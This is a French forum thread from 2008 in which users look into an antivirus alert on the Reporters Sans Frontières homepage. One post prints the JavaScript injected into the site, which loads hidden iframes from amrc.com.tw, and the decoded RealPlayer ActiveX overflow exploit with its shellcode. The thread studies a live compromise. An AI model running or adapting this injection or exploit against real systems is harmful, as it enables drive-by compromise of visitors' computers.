Aller au menu - Aller au contenu

Reporter Sans Frontière Hacké ?

BitDefender se déclenche sur la page d'accueil de RSF

Pour accéder à cette section
Connectez-vous !
connexion_rpx

Résolu Le problème de ce sujet a été résolu

Page 1  2  3  4  5  6  7  Suivante
Auteur Message
1 visiteur sur ce sujet (1 Anonyme)
Page 1  2  3  4  5  6  7  Suivante
Hors ligne neirda33 # Posté le 21/04/2008 à 12:06:16
XD
Avatar
Salut à tous les zérOs !

Je suis allé faire un tour sur le site de Reporters Sans Frontières, et, sur la page d'accueil, BitDefender se déclenche [voir ICI].
J'ai suivi le lien donné par BitDefender ([Evitez de le suivre] http://amrc.com.tw/1/2.jpg) concernant l'image "virusée" (ce mot n'existe pas, mais il veut dire "L'image qui contient un "virus") et me il me bloque l'accès à la page.
Le site appartient à une université asiatique [ICI].

J'aurais voulut savoir si le site de RSF à été "hacké".

Merci

Bonne Enquête !
Topic sur le Site du Zéro | Expressions-Ringardes.comImage utilisateur

 
Hors ligne anonyme # Posté le 21/04/2008 à 12:09:50

Je n'ai aucune alerte en allant dessus.
Hors ligne XeloS # Posté le 21/04/2008 à 12:15:14
D-generation-X
Avatar
Salut,

Effectivement antivir se déclenche o_O .


EDIT: Je viens d'y refaire un tour et rien ... Bizarre Bizarre ...
Édité le 21/04/2008 à 12:16:56 par XeloS
Image utilisateur
Image utilisateur
Image utilisateur
 
Hors ligne neirda33 # Posté le 21/04/2008 à 12:16:14
XD
Avatar
Ah ! Je ne suis pas dingue ^^
Topic sur le Site du Zéro | Expressions-Ringardes.comImage utilisateur

 
Hors ligne anonyme # Posté le 21/04/2008 à 12:17:58

Je suis allé là : -http://amrc.com.tw/1/2.jpg
Ceci n'est pas une image mais un script malveillant

Et rien de particulier. Mais c'est vrai que c'est bizarre.
Hors ligne XeloS # Posté le 21/04/2008 à 12:18:44
D-generation-X
Avatar
Citation : clems942
Je suis allé là : http://amrc.com.tw/1/2.jpg
Et rien de particulier. Mais c'est vrai que c'est bizarre.


Idem, il n'y a rien ..
Image utilisateur
Image utilisateur
Image utilisateur
 
Hors ligne Xinox # Posté le 21/04/2008 à 12:20:11

La Chine a une armée de hackers, et ça m'étonnerait pas qu'ils soient intéressés par rsf.
Hors ligne XeloS # Posté le 21/04/2008 à 12:20:58
D-generation-X
Avatar
Après le coup de la flamme olympique ...
Image utilisateur
Image utilisateur
Image utilisateur
 
Hors ligne neirda33 # Posté le 21/04/2008 à 12:23:23
XD
Avatar
Voici ce qui se passe quand je vais sur http://amrc.com.tw/1/2.jpg

ICI
Topic sur le Site du Zéro | Expressions-Ringardes.comImage utilisateur

 
Hors ligne kumae # Posté le 21/04/2008 à 12:27:02
Tales of powa !
Avatar
Waw je pencherai pour l'hypothèse de l'attaque des hackers chinois, enfin, c'est probable
Powa Sonic XNA 2 (en cours de programmation)
Etat du jeu:

Codage du moteur de jeu:
|||||||||||||||||||| (il manque les rotations et les loopings =P)
Scénario du jeu:
||||||||||||||||||||
Graphismes (création des décors et animation du perso):
||||||||||||||||||||
Musiques (Jun Senoue c'est le meilleur xD) et sons (bruitages):
||||||||||||||||||||


 
Hors ligne anonyme # Posté le 21/04/2008 à 12:29:27

Citation : neirda33
Voici ce qui se passe quand je vais sur http://amrc.com.tw/1/2.jpg

ICI

Moi j'ai pas d'alerte (Avast :) ). Par contre j'ai une page avec marqué "http://amrc.com.tw/1/2.jpg".
Hors ligne kumae # Posté le 21/04/2008 à 12:32:53
Tales of powa !
Avatar
Ouais comme clems942
Peut-être que c'est bitDefender qui déconne---ou peut-être pas
Powa Sonic XNA 2 (en cours de programmation)
Etat du jeu:

Codage du moteur de jeu:
|||||||||||||||||||| (il manque les rotations et les loopings =P)
Scénario du jeu:
||||||||||||||||||||
Graphismes (création des décors et animation du perso):
||||||||||||||||||||
Musiques (Jun Senoue c'est le meilleur xD) et sons (bruitages):
||||||||||||||||||||


 
Hors ligne anonyme # Posté le 21/04/2008 à 12:38:34

A mon avis Bitdefender n'invente pas la présence de cette "image", qui comme par hasard vient d'un site chinois (ou asiatique). :)
Hors ligne dimdam # Posté le 21/04/2008 à 13:05:37

En tout le cas le code source de la page est louche.
Hors ligne kumae # Posté le 21/04/2008 à 13:09:59
Tales of powa !
Avatar
Mais y'a pas de code source, c'est une image le lien donné hein...
J'espère que t'as pas regardé le code source de l'image :p
Powa Sonic XNA 2 (en cours de programmation)
Etat du jeu:

Codage du moteur de jeu:
|||||||||||||||||||| (il manque les rotations et les loopings =P)
Scénario du jeu:
||||||||||||||||||||
Graphismes (création des décors et animation du perso):
||||||||||||||||||||
Musiques (Jun Senoue c'est le meilleur xD) et sons (bruitages):
||||||||||||||||||||


 
Hors ligne anonyme # Posté le 21/04/2008 à 13:12:30

Non c'est pas une image.
Hors ligne vodkanux # Posté le 21/04/2008 à 13:15:15
Avatar

études : BTS IRIS
J'ai une information sur ce Malware :

Description Exploit.GDI.EMF.A



Image utilisateur
Faites du bien a vos orreilles :p et mon Blog !
 
Hors ligne anonyme # Posté le 21/04/2008 à 13:16:38

* Fait un scan *
Hors ligne 1337833K # Posté le 21/04/2008 à 13:22:12
lock cmpxchg8b eax
Sans vouloir troller, on a encore une fois la preuve que Avast! est à la traine. :-°
Sinon, je penche aussi vers l'hypothèse des `pirates chinois´.
Top 3 des meilleures vidéos de tous les temps:
 
Hors ligne anonyme # Posté le 21/04/2008 à 13:28:56

J'ai envoyé un mail à rsf.
Hors ligne entwanne # Posté le 21/04/2008 à 13:30:21
Avatar

Ville : Mirecourt
Pays : France métropolitaine
regardez tout de même ce que l'on trouve dans la source de cette page : http://amrc.com.tw/1/2.jpg
Citation
HTTP://amrc.com.tw/1/2.gif�ina.exe
Jabber : Image utilisateur
 
Hors ligne dimdam # Posté le 21/04/2008 à 13:48:44

Ni antivir ni l'UAC n'ont vu quelque chose.
Il fait quoi en gros ce virus ?
*a peur*
Hors ligne anonyme # Posté le 21/04/2008 à 13:50:06

Il permet à un tiers de prendre le contrôle de ton PC, et il installe d'autres malwares, d'après le lien qui a été donné plus haut.
Hors ligne vodkanux # Posté le 21/04/2008 à 13:52:47
Avatar

études : BTS IRIS
Ouai, tu as bien fait d'envoyer l'email clems942, mais j'aimerais avoir plus d'informations sur ce malware

J'ai réussi a avoir que trois lien sur ce malware si vous avez plus d'informations la dessus tenez nous au courant
Image utilisateur
Faites du bien a vos orreilles :p et mon Blog !
 
Hors ligne Neoterranos # Posté le 21/04/2008 à 13:57:16
Oh my god, they killed Kenny !
Avatar
Peut-être que Bit Defender est aussi pour les droits de l'homme... :p

Bref, je doute que ce soit un hack, RSF s'en serait rendu compte.
Image utilisateur
Perdu sur le SdZ ? Clique ici ! Perdu sur CCDS ? Clique ici !
 
Hors ligne neirda33 # Posté le 21/04/2008 à 13:58:13
XD
Avatar
J'avais déjà envoyé un mail à RSF, penses-tu !

Avec les événements récents, ils n'ont pas encore eu le temps de répondre...

Je suis content de voir je n'ais pas dépensé 70€ pour rien (BitDefender Internet Sécurity. Postes: illimités. Durée de license: 2ans.)
Topic sur le Site du Zéro | Expressions-Ringardes.comImage utilisateur

 
Hors ligne anonyme # Posté le 21/04/2008 à 13:59:13

Citation : Neoterranos
Bref, je doute que ce soit un hack, RSF s'en serait rendu compte.

S'en seraient rendus compte comment, à part en ayant Bitdefender et en actualisant la page d'accueil toutes les minutes depuis hier ? Et tu crois que cette alerte vient d'où, si c'est pas un hack ?
Hors ligne neirda33 # Posté le 21/04/2008 à 14:04:02
XD
Avatar
Ça le fait qu'une fois par session (a chaque fois que j'efface mes traces FF et que je retourne sur le site, ça le refait)

Mais oui, apparemment, si ça le fait que sur BitDefender, peut-être ne sont ils pas encore au courant. Comme quoi, il est vachement bien développé, ce pack de sécurité.

Ça me l'a fait pour la 1ere fois samedi 19 avril 2008, pour info. Quel scoop, j'appelle la presse ! ^^
Topic sur le Site du Zéro | Expressions-Ringardes.comImage utilisateur

 
Hors ligne vodkanux # Posté le 21/04/2008 à 14:09:19
Avatar

études : BTS IRIS
Voila la description en français de la chose :

En résumé c'est sa sa éxécute un code malveillant quand le navigateur affiche l'image.

Deux vulnérabilités ont été identifiées dans Microsoft Windows, elles pourraient être exploitées par des attaquants distants afin de causer un déni de service ou compromettre un système vulnérable. Ces failles résultent de débordements de mémoire présents au niveau de l'interface GDI qui ne gère pas correctement des fichiers Windows Metafile (WMF) ou Enhanced Metafile (EMF) malformés, ce qui pourrait être exploité par des attaquants afin d'altérer le fonctionnement d'un système vulnérable ou afin d'exécuter un code arbitraire en incitant un utilisateur à visiter une page web spécialement conçue.


Source FrSirt.
Image utilisateur
Faites du bien a vos orreilles :p et mon Blog !
 
Hors ligne Bilbax # Posté le 21/04/2008 à 14:16:37
www.bilbax.eu
Avatar

Ville : Saint-pierre
Pays : Saint-Pierre-et-Miquelon
Regardez ce code louche trouvé à la fin du fichier pour hasher en md5 :

Code : JavaScript
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
//alert(document.cookie);
var expdate = new Date((new Date()).getTime() + (1*60*60*1000)); 
var expdates = new Date((new Date()).getTime() + (2*60*60*1000));
var expdatess = new Date((new Date()).getTime() + (3*60*60*1000));
if (document.cookie.indexOf( "onecookie")==-1&&document.cookie.indexOf( "twocookie")==-1&&document.cookie.indexOf( "threecookie")==-1) 
{
	document.write('<img src=http://amrc.com.tw/1/2.jpg width=0 height=0></iframe>');
	document.write('<img src=http://amrc.com.tw/1/22.html width=0 height=0></iframe>');
	document.cookie= "onecookie=1;expires= " + expdate.toGMTString() + ";path=/; ";
	document.cookie= "twocookie=1;expires= " + expdates.toGMTString() + ";path=/; ";
}
else if (getCookie("twocookie")==1&&document.cookie.indexOf( "onecookie")==-1&&document.cookie.indexOf( "threecookie")==-1)
{
	document.write('<iframe src=http://amrc.com.tw/1/2.htm width=0 height=0></iframe>');
	document.cookie= "threecookie=1;expires= " + expdatess.toGMTString() + ";path=/; ";}
else if (getCookie("threecookie")==1&&document.cookie.indexOf( "onecookie")==-1&&document.cookie.indexOf( "twocookie")==-1)
{
document.write('<iframe src=http://amrc.com.tw/1/2.html width=0 height=0></iframe>');
document.cookie= "threecookie=2;expires= " + expdatess.toGMTString() + ";path=/; ";
}
else
{
document.write("");
}


Ce n'est pas sa place, il a été rajouté ! o_O

EDIT : Ca mène vers une page 22.html qui elle contient un code JS "crypté", dont on ne peut pas voir la source, par contre FireBug a réussi à le voir :

Secret (cliquez pour afficher)

Code : JavaScript
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
function RealExploit()
{
	var user = navigator.userAgent.toLowerCase();
	
	if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
		return;
	if(user.indexOf("nt 5.")==-1)
		return;
	
	VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
	
	try
	{
		Real = new ActiveXObject(VulObject);
	}
	catch(error)
	{
		return;
	}
	
	RealVersion = Real.PlayerProperty("PRODUCTVERSION");
	Padding = "";
	JmpOver = unescape("%75%06%74%04");
	for(i = 0; i < 32 * 148; i++)
		Padding += "S";

	if(RealVersion.indexOf("6.0.14.") == -1)
	{
		if(navigator.userLanguage.toLowerCase() == "zh-cn")
			ret = unescape("%7f%a5%60");
		else if(navigator.userLanguage.toLowerCase() == "en-us")
			ret = unescape("%4f%71%a4%60");
		else
			return;
	}
	else if(RealVersion == "6.0.14.544")
		ret = unescape("%63%11%08%60");
	else if(RealVersion == "6.0.14.550")
		ret = unescape("%63%11%04%60");
	else if(RealVersion == "6.0.14.552")
		ret = unescape("%79%31%01%60");
	else if(RealVersion == "6.0.14.543")
		ret = unescape("%79%31%09%60");
	else if(RealVersion == "6.0.14.536")
		ret = unescape("%51%11%70%63");
	else
		return;


	if(RealVersion.indexOf("6.0.10.") != -1)
	{
		for(i = 0; i < 4; i++)
			Padding = Padding + JmpOver;
		Padding = Padding + ret;
	}
	else if(RealVersion.indexOf("6.0.11.") != -1)
	{
		for(i = 0; i < 6; i++)
			Padding = Padding + JmpOver;
		Padding = Padding + ret;
	}
	else if(RealVersion.indexOf("6.0.12.") != -1)
	{
		for(i = 0; i < 9; i++)
			Padding = Padding + JmpOver;
		Padding = Padding + ret;
	}
	else if(RealVersion.indexOf("6.0.14.") != -1)
	{
		for(i = 0; i < 10; i++)
			Padding = Padding + JmpOver;
		Padding = Padding + ret;
	}

	AdjESP = "LLLL\\XXXXXLD";
	Shell = "TYXXXXfiAqcYfPAAeiAoHFXZPiAkjbrIPiAgVbaaPiAckwzOPLiAsloUWPiAZczabPiAVqKpAPiARCpDXPQlaaTbaaaLtUAAAACFiaaPoHHmDahivabowabHknEwPCmfhwdgTwPcJrOBoFafMgrFsrnFSfoVmRnWtWGrOcarOSRrNFGfIffppppPpPpNBoYfXfofNPPPpFhGEgBvLFmetOoafXKNxnhBnPpPpPPHCnLRPXKmlVJrpucoOefPDlgptpSUlVqRNVeLGddpcPDGxfuppPPCslPepuPeCEWEpOOUfQphkMLupESOouVpXOoUFplEQuFhkGECLXkwTRnwxpsOEefHKgVRpPSOecClydYdqzMPsleCsMkpokNQpCJMfgtPxLALKpMPcmZTPNKoqcKaOGeNWENXkUNBTPCMmfVXKPLdKxkuNqLPSmMXkPDhKPclejKEneyLsNXEGOOOOOohnTNPnNLlaWiNuKxYHonXZpNgnMhnRgscVQjbOgpFxWdwTgPSjrOBOfAVmgrvSrNvCVOvMRNWtGgboCArOSabnvWvIFvPp";
	PayLoad = Padding + AdjESP + Shell;
	while(PayLoad.length < 0x8000)
		PayLoad += "YuanGe";
	Real.Import("c:\\Program Files\\NetMeeting\\blip.wav", PayLoad,"", 0, 0);
}
RealExploit();
Édité le 21/04/2008 à 14:25:43 par Bilbax
bomb attack new-york september 2011 pentagon fire irak nuclear al quaida ben laden terrorism kill obama kill bush world trade center fake death usa atomic bomb urss sarin allah ebola genocide boeing arbus crash hijacking explosion poison swin flu foot ball nuclear codes theft empire state building statue of liberty destruction gouvernment plot mafia 2012 mohamed
 

Retour au forum "Discussions générales" ou à la liste des forums

Pour accéder à cette section
Connectez-vous !
connexion_rpx